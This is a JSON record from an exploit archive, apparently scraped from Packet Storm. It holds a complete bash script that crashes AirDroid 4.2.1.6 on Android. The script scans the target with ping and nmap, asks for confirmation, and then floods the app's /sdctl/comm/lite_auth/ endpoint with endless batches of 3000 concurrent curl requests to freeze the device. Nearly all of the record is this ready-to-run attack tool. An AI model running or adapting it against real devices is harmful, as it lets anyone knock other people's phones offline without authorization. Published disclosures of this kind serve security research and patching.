{"id": "PACKETSTORM:151596", "type": "packetstorm", "bulletinFamily": "exploit", "title": "AirDroid 4.2.1.6 Denial Of Service", "description": "", "published": "2019-02-11T00:00:00", "modified": "2019-02-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/151596/AirDroid-4.2.1.6-Denial-Of-Service.html", "reporter": "Marcelo Vazquez", "references": [], "cvelist": [], "lastseen": "2019-02-12T02:59:58", "viewCount": 88, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/151596/airdroid4216-dos.txt", "sourceData": "`#!/bin/bash \n \n# ***************************************************** \n# * Author: Marcelo VA!zquez (aka s4vitar) * \n# * AirDroid Denial of Service (DoS) & System Crash * \n# ***************************************************** \n \n# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash \n# Date: 2019-02-07 \n# Exploit Author: Marcelo VA!zquez \n# Vendor Homepage: https://web.airdroid.com/ \n# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en \n# Version: AirDroid 4.2.1.6 \n# Tested on: Android \n \n#Colours \ngreenColour=\"\\e[0;32m\\033[1m\" \nendColour=\"\\033[0m\\e[0m\" \nredColour=\"\\e[0;31m\\033[1m\" \nblueColour=\"\\e[0;34m\\033[1m\" \nyellowColour=\"\\e[0;33m\\033[1m\" \npurpleColour=\"\\e[0;35m\\033[1m\" \nturquoiseColour=\"\\e[0;36m\\033[1m\" \ngrayColour=\"\\e[0;37m\\033[1m\" \n \ntrap ctrl_c INT \n \nfunction ctrl_c() { \necho -e \"\\n\\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour}Exiting...${endColour}\\n\" && tput cnorm \npkill curl > /dev/null 2>&1 \nexit \n} \n \nfunction check_host(){ \n# Target availability detection \necho -e \"${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking host availability...${endColour}\" && sleep 1 \n \nping -c 1 $host > /dev/null 2>&1 \n \nif [ \"$(echo $?)\" == \"0\" ]; then \necho -e \"\\n\\t${greenColour}--${endColour}${redColour} Host is active${endColour}${greenColour} --${endColour}\\n\" \nelse \necho -e \"\\n\\t${greenColour}--${endColour}${redColour} Host is inactive${endColour}${greenColour} --${endColour}\\n\" && tput cnorm && exit \nfi \n \necho -e \"${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking if port is open...${endColour}\" && sleep 1 \n \nif [ \"$(nmap -p$port --open -T5 -v -n $host | grep open)\" ] && [ \"$(nmap -p$port $host -sC -sV | grep -i airdroid)\" ]; then \necho -e \"\\n\\t${greenColour}--${endColour}${redColour} Port${endColour}${grayColour} $port${endColour}${redColour} is open!!${endColour}${greenColour} --${endColour}\\n\" \necho -e \"\\t${greenColour}--${endColour}${redColour} ${endColour}${turquoiseColour}Airdroid Service${endColour}${redColour} detected !!${endColour}${greenColour} --${endColour}\\n\" \nelif [ \"$(nmap -p$port --open -T5 -v -n $host | grep open)\" ]; then \necho -e \"\\n\\t${greenColour}--${endColour}${redColour} Port is open but it does not correspond to the ${endColour}${turquoiseColour}Airdroid service${endColour}${redColour}!!${endColour}${greenColour} --${endColour}\\n\" && tput cnorm && exit \nelse \necho -e \"\\n\\t${greenColour}--${endColour}${redColour} Port is closed!!${endColour}${greenColour} --${endColour}\\n\" && tput cnorm && exit \nfi \n} \n \nfunction banner() \n{ \nsleep 0.2 && echo -e \"\\n$redColour /\\ $endColour\" \nsleep 0.2 && echo -e \"$redColour / \\ $endColour\" \nsleep 0.2 && echo -e \"$redColour | | $endColour $yellowColour[${endColour}${grayColour}AirDroid Denial of Service (DoS) [System Crash]${endColour}${yellowColour}]${endColour}\" \nsleep 0.2 && echo -e \"$redColour | | $endColour ${yellowColour}Author:${endColour}${grayColour} Marcelo VA!zquez (aka s4vitar)${endColour}\" \nsleep 0.2 && echo -e \"$redColour / == \\ $endColour\" \nsleep 0.2 && echo -e \"$redColour |/**\\| $endColour\" \nsleep 0.2 && for i in $(seq 1 70); do echo -ne \"${redColour}-${endColour}\"; done && sleep 1 && echo \n} \n \nif [ \"$(echo $#)\" == \"2\" ]; then \ntput civis && banner \nhost=$1 && port=$2 \necho && check_host \n \n# Path to launch the message box on the mobile device \nurl=\"http://$host:$port/sdctl/comm/lite_auth/\" \n \ntput cnorm && echo -ne \"${yellowColour}You want to start the attack?${endColour}${grayColour} <${endColour}${redColour}y${endColour}${turquoiseColour}/${endColour}${blueColour}n${endColour}${grayColour}>${endColour}${grayColour}:${endColour} \" && read attack_response \n \nif [ \"$(echo $attack_response)\" == \"y\" ]; then \ncounter=0 \n \n# Start launch attack of the message boxes, so the Application crash and the device freezes \ntput civis && while true; do \nfor i in $(seq 1 3000); do \ncurl --silent \"$url\" & \nlet counter+=1 \ndone && wait \necho -e \"\\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${redColour} $counter${endColour}${grayColour} requests successfully sent${endColour}${redColour}!!${endColour}\" \ndone \nelse \n: \nfi \nelse \necho -e \"\\n${blueColour}Usage: ${endColour}${redColour}./airdroid_dos.sh ${endColour}${yellowColour}<${endColour}${grayColour}ip_address${endColour}${yellowColour}>${endColour}${yellowColour} <${endColour}${grayColour}port${endColour}${yellowColour}>${endColour}\\n\" \nfi \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645362537}}

{}